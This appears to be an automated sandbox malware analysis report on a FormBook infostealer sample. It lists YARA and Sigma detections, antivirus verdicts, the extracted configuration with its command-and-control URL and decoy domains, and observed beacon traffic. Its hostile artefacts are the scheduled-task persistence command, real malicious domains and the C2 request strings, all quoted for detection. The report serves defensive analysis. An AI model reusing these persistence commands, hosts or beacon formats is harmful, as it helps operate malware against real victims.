6.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
6.2.RegSvcs.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.RegSvcs.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a39:$sqlite3step: 68 34 1C 7B E1 0x17b4c:$sqlite3step: 68 34 1C 7B E1 0x17a68:$sqlite3text: 68 38 2A 90 C5 0x17b8d:$sqlite3text: 68 38 2A 90 C5 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
6.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
6.2.RegSvcs.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
6.2.RegSvcs.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.RegSvcs.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 5 entries

Sigma Signatures

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tsnokiirph" /XML "C:\Users\user\AppData\Local\Temp\tmp7F5F.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tsnokiirph" /XML "C:\Users\user\AppData\Local\Temp\tmp7F5F.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\22#U0415.exe, ParentImage: C:\Users\user\Desktop\22#U0415.exe, ParentProcessId: 6372, ParentProcessName: 22#U0415.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tsnokiirph" /XML "C:\Users\user\AppData\Local\Temp\tmp7F5F.tmp, ProcessId: 6992, ProcessName: schtasks.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 22#U0415.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.venitro.com/gy14/www.batuoe.com	Avira URL Cloud: Label: malware
Source: http://www.mtdiyx.xyz/gy14/	Avira URL Cloud: Label: phishing
Source: http://www.0854n5.shop	Avira URL Cloud: Label: phishing
Source: http://www.tulisanemas.com/gy14/www.amiciperlacoda.com	Avira URL Cloud: Label: malware
Source: http://www.alterdpxlmarketing.com/gy14/www.yzyz841.xyz	Avira URL Cloud: Label: malware
Source: http://www.zom11.com/gy14/www.dianetion.com	Avira URL Cloud: Label: malware
Source: http://www.batuoe.com/gy14/	Avira URL Cloud: Label: malware
Source: http://www.dianetion.com/gy14/www.artbydianayorktownva.com	Avira URL Cloud: Label: malware
Source: http://www.batuoe.com/gy14/www.zezfhys.com	Avira URL Cloud: Label: malware
Source: http://www.0854n5.shop/gy14/	Avira URL Cloud: Label: malware
Source: http://www.tulisanemas.com/gy14/	Avira URL Cloud: Label: malware
Source: http://www.artbydianayorktownva.com/gy14/www.survivordental.com	Avira URL Cloud: Label: malware
Source: http://www.theanhedonia.com/gy14/	Avira URL Cloud: Label: malware
Source: http://www.yzyz841.xyz/gy14/	Avira URL Cloud: Label: phishing
Source: http://www.yzyz841.xyz	Avira URL Cloud: Label: phishing
Source: http://www.harborspringsfire.com/gy14/	Avira URL Cloud: Label: malware
Source: http://www.mtdiyx.xyz/gy14/www.theanhedonia.com	Avira URL Cloud: Label: phishing
Source: http://www.v72999.com/gy14/www.mtdiyx.xyz	Avira URL Cloud: Label: malware
Source: http://www.venitro.com/gy14/	Avira URL Cloud: Label: malware
Source: http://www.amiciperlacoda.com/gy14/	Avira URL Cloud: Label: phishing
Source: http://www.survivordental.com/gy14/	Avira URL Cloud: Label: malware
Source: http://www.zom11.com/gy14/	Avira URL Cloud: Label: malware
Source: http://www.survivordental.com/gy14/www.tulisanemas.com	Avira URL Cloud: Label: malware
Source: http://www.alterdpxlmarketing.com/gy14/?8pB8=qN98lNP8T4bXSv70&NBZlJ=J9/jgP9Re4KtuF0AsBPpjtalVscOAyQ/qvU9Qh627akK0Y3++VNxqCagaMddKEOxon78	Avira URL Cloud: Label: malware
Source: http://www.zezfhys.com/gy14/www.zom11.com	Avira URL Cloud: Label: malware
Source: http://www.v72999.com/gy14/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe

Avira: detection malicious, Label: HEUR/AGEN.1305634

Found malware configuration

Source: 0000000C.00000002.2869863724.0000000002E70000.00000040.80000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.venitro.com/gy14/"], "decoy": ["mavbam.com", "theanhedonia.com", "budgetnurseries.com", "buflitr.com", "alqamarhotel.com", "2660348.top", "123bu6.shop", "v72999.com", "yzyz841.xyz", "247fracing.com", "naples.beauty", "twinklethrive.com", "loscaseros.com", "creditspisatylegko.site", "sgyy3ej2dgwesb5.com", "ufocafe.net", "techn9nehollywoodundead.com", "truedatalab.com", "alterdpxlmarketing.com", "harborspringsfire.com", "soulheroes.online", "tryscriptify.com", "collline.com", "tulisanemas.com", "thelectricandsolar.com", "jokergiftcard.buzz", "sciencemediainstitute.com", "loading-231412.info", "ampsportss.com", "dianetion.com", "169cc.xyz", "zezfhys.com", "smnyg.com", "elenorbet327.com", "whatsapp1.autos", "0854n5.shop", "jxscols.top", "camelpmkrf.com", "myxtremecleanshq.services", "beautyloungebydede.online", "artbydianayorktownva.com", "functional-yarns.com", "accepted6.com", "ug19bklo.com", "roelofsen.online", "batuoe.com", "amiciperlacoda.com", "883831.com", "qieqyt.xyz", "vendorato.online", "6733633.com", "stadtliche-arbeit.info", "survivordental.com", "mrbmed.com", "elbt-ag.com", "mtdiyx.xyz", "mediayoki.site", "zom11.com", "biosif.com", "aicashu.com", "inovarevending.com", "8x101n.xyz", "ioherstrulybeauty.com", "mosaica.online"]}

Multi AV Scanner detection for domain / URL

Source: alterdpxlmarketing.com	Virustotal: Detection: 6%	Perma Link
Source: http://www.venitro.com/gy14/www.batuoe.com	Virustotal: Detection: 8%	Perma Link
Source: http://www.venitro.com/gy14/	Virustotal: Detection: 7%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe

ReversingLabs: Detection: 32%

Multi AV Scanner detection for submitted file

Source: 22#U0415.exe	ReversingLabs: Detection: 32%
Source: 22#U0415.exe	Virustotal: Detection: 47%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2869863724.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1717172905.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2870656391.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1671381278.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2870381691.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1703327981.0000000005093000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 22#U0415.exe

Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\22#U0415.exe

Unpacked PE file: 0.2.22#U0415.exe.3f0000.0.unpack

Source: 22#U0415.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 22#U0415.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: colorcpl.pdbGCTL source: RegSvcs.exe, 0000000E.00000002.1714329535.0000000001148000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1718226263.0000000003280000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1718125345.0000000000F80000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: systray.pdb source: RegSvcs.exe, 00000006.00000002.1705176684.0000000001088000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1705014609.0000000000FB0000.00000040.10000000.00040000.00000000.sdmp, systray.exe, 0000000C.00000002.2869550150.0000000000B30000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: colorcpl.pdb source: RegSvcs.exe, 0000000E.00000002.1714329535.0000000001148000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1718226263.0000000003280000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1718125345.0000000000F80000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: systray.pdbGCTL source: RegSvcs.exe, 00000006.00000002.1705176684.0000000001088000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1705014609.0000000000FB0000.00000040.10000000.00040000.00000000.sdmp, systray.exe, 0000000C.00000002.2869550150.0000000000B30000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb, source: explorer.exe, 00000007.00000002.2888348425.0000000010DDF000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 0000000C.00000002.2872022981.000000000529F000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 0000000C.00000002.2870147889.0000000003115000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000C.00000002.2871177410.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000C.00000003.1706604032.0000000004BA1000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000C.00000002.2871177410.0000000004EEE000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000C.00000003.1705146042.00000000049FB000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000003.1715666397.00000000046FD000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1718183252.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000003.1713382860.0000000004548000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1718183252.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, systray.exe, 0000000C.00000002.2871177410.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000C.00000003.1706604032.0000000004BA1000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000C.00000002.2871177410.0000000004EEE000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000C.00000003.1705146042.00000000049FB000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000003.1715666397.00000000046FD000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1718183252.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000003.1713382860.0000000004548000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1718183252.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: explorer.exe, 00000007.00000002.2888348425.0000000010DDF000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 0000000C.00000002.2872022981.000000000529F000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 0000000C.00000002.2870147889.0000000003115000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\AppxSip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\catroot2	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\ccdc87283bb430dd204d0f658bca1ec9\Microsoft.Management.Infrastructure.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\OpcServices.DLL	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pwrshsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\wshext.dll	Jump to behavior

Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	0_2_04E5B618
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	0_2_04E59B4C
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_09430F44
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 4x nop then xor edx, edx	0_2_09431760
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_0943138C
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 4x nop then xor edx, edx	0_2_09431754
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop esi	6_2_004172D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop esi	6_2_00417287
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop edi	6_2_0040E46A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop edi	6_2_00416CC5
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	8_2_0597B648
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	8_2_05979B4C
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 4x nop then push dword ptr [ebp-24h]	8_2_09C81828
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	8_2_09C81828
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	8_2_09C80F44
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 4x nop then xor edx, edx	8_2_09C81760
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 4x nop then push dword ptr [ebp-24h]	8_2_09C8181C
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	8_2_09C8181C
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	8_2_09C8138C
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 4x nop then push dword ptr [ebp-20h]	8_2_09C81508
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	8_2_09C81508
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 4x nop then push dword ptr [ebp-20h]	8_2_09C814FF
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	8_2_09C814FF
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Code function: 4x nop then xor edx, edx	8_2_09C81754
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4x nop then pop edi	12_2_02E7E46A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4x nop then pop edi	12_2_02E86CC5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4x nop then pop esi	12_2_02E872D9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4x nop then pop esi	12_2_02E87287

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.224.212.212 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 15.197.142.173 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.80.45.39 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.venitro.com/gy14/

Source: global traffic	HTTP traffic detected: GET /gy14/?8pB8=qN98lNP8T4bXSv70&NBZlJ=y7EXzckSInqxOjpGcfAId1VUK6tUhu58CGMbocv7TQhRUEwsApxFieb+ctLyVVSqDnLX HTTP/1.1Host: www.v72999.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy14/?8pB8=qN98lNP8T4bXSv70&NBZlJ=sJB9xXC4L0bq2ox6VvMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs633JlGPbuQ58 HTTP/1.1Host: www.theanhedonia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy14/?8pB8=qN98lNP8T4bXSv70&NBZlJ=J9/jgP9Re4KtuF0AsBPpjtalVscOAyQ/qvU9Qh627akK0Y3++VNxqCagaMddKEOxon78 HTTP/1.1Host: www.alterdpxlmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 15.197.142.173 15.197.142.173

Source: Joe Sandbox View	ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
Source: Joe Sandbox View	ASN Name: LEASEWEB-USA-LAX-11US LEASEWEB-USA-LAX-11US
Source: Joe Sandbox View	ASN Name: TANDEMUS TANDEMUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 7_2_0F4E7F82 getaddrinfo,setsockopt,recv,

7_2_0F4E7F82

Source: global traffic	HTTP traffic detected: GET /gy14/?8pB8=qN98lNP8T4bXSv70&NBZlJ=y7EXzckSInqxOjpGcfAId1VUK6tUhu58CGMbocv7TQhRUEwsApxFieb+ctLyVVSqDnLX HTTP/1.1Host: www.v72999.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy14/?8pB8=qN98lNP8T4bXSv70&NBZlJ=sJB9xXC4L0bq2ox6VvMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs633JlGPbuQ58 HTTP/1.1Host: www.theanhedonia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy14/?8pB8=qN98lNP8T4bXSv70&NBZlJ=J9/jgP9Re4KtuF0AsBPpjtalVscOAyQ/qvU9Qh627akK0Y3++VNxqCagaMddKEOxon78 HTTP/1.1Host: www.alterdpxlmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.v72999.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Tue, 05 Dec 2023 09:44:53 GMTContent-Type: text/htmlContent-Length: 118Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Source: explorer.exe, 00000007.00000002.2873939169.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2877317802.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1656778904.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000007.00000002.2873939169.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2877317802.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1656778904.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000007.00000002.2873939169.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2877317802.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1656778904.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 22#U0415.exe, 00000000.00000002.1670630043.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, tsnokiirph.exe, 00000008.00000002.1701973301.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ieeexplore.ieee.org/xpl/downloadCitations?recordIds=
Source: 22#U0415.exe, 00000000.00000002.1670630043.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, tsnokiirph.exe, 00000008.00000002.1701973301.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ieeexplore.ieee.org/xpl/downloadCitations?recordIds=C&citations-format=citation-abstract&down
Source: explorer.exe, 00000007.00000002.2873939169.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2877317802.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1656778904.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000007.00000002.2873939169.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000007.00000002.2876000518.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2878928889.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2876563487.0000000008720000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: 22#U0415.exe, 00000000.00000002.1670630043.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, tsnokiirph.exe, 00000008.00000002.1701973301.0000000003645000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: tsnokiirph.exe, 00000008.00000002.1701973301.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/QLTLDataSet.xsd
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.0854n5.shop
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.0854n5.shop/gy14/
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.0854n5.shop/gy14/www.venitro.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.0854n5.shopReferer:
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alterdpxlmarketing.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alterdpxlmarketing.com/gy14/
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alterdpxlmarketing.com/gy14/www.yzyz841.xyz
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alterdpxlmarketing.comReferer:
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.amiciperlacoda.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.amiciperlacoda.com/gy14/
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.amiciperlacoda.com/gy14/DW
